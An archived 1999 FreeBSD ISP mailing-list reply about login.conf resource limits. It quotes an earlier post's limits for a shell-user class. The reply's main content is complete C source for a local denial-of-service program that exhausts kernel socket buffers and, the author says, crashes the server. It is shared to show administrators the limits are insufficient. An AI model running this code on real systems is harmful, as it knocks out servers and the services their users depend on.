Date: Thu, 4 Nov 1999 23:36:03 -0500 (EST) From: <up@3.am> To: Mike Tancsa <mike@sentex.net> Cc: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits Message-ID: <Pine.GSO.4.10.9911042331170.8377-100000@richard2.pil.net> In-Reply-To: <38224635.260144868@mail.sentex.net>
next in thread | previous in thread | raw e-mail | index | archive | help
I got news for you, that ain't going to stop the DoS. Compile and run this code as a user from your shellu class It will crash your server, so don't do it on a production box (BTW, I had checked the security list archives and saw a thread on this, but no answers that worked): #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } On Fri, 5 Nov 1999, Mike Tancsa wrote: > On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you wrote: > > > > >This is what I came up with after checking out the man pages and examples > >in login.conf. If someone who's addressed this has a good example default > >config, that would be very helpful. > > shellu:\ > :cputime=infinity:\ > :datasize-cur=8M:\ > :datasize-max=8M:\ > :stacksize-cur=4M:\ > :stacksize-max=4M:\ > :memorylocked-cur=10M:\ > :memorylocked-max=10M:\ > :memoryuse-cur=10M:\ > :memoryuse-max=10M:\ > :filesize=infinity:\ > :coredumpsize=infinity:\ > :maxproc-cur=5:\ > :maxproc-max=5:\ > :openfiles-cur=64:\ > :openfiles-max=64:\ > :priority=0:\ > :requirehome@:\ > :umask=022:\ > :tc=auth-defaults: > > is what I use for my casual shell users... Dont forget > > cap_mkdb /etc/login.conf > > ---Mike > Mike Tancsa (mdtancsa@sentex.net) > Sentex Communications Corp, > Waterloo, Ontario, Canada > "Given enough time, 100 monkeys on 100 routers > could setup a national IP network." (KDW2) > James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am ========================================================================= ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans 3 days of clues, news, and views from the industry's best and brightest. Visit <http://www.ispf.com/> for information and registration. ========================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.GSO.4.10.9911042331170.8377-100000>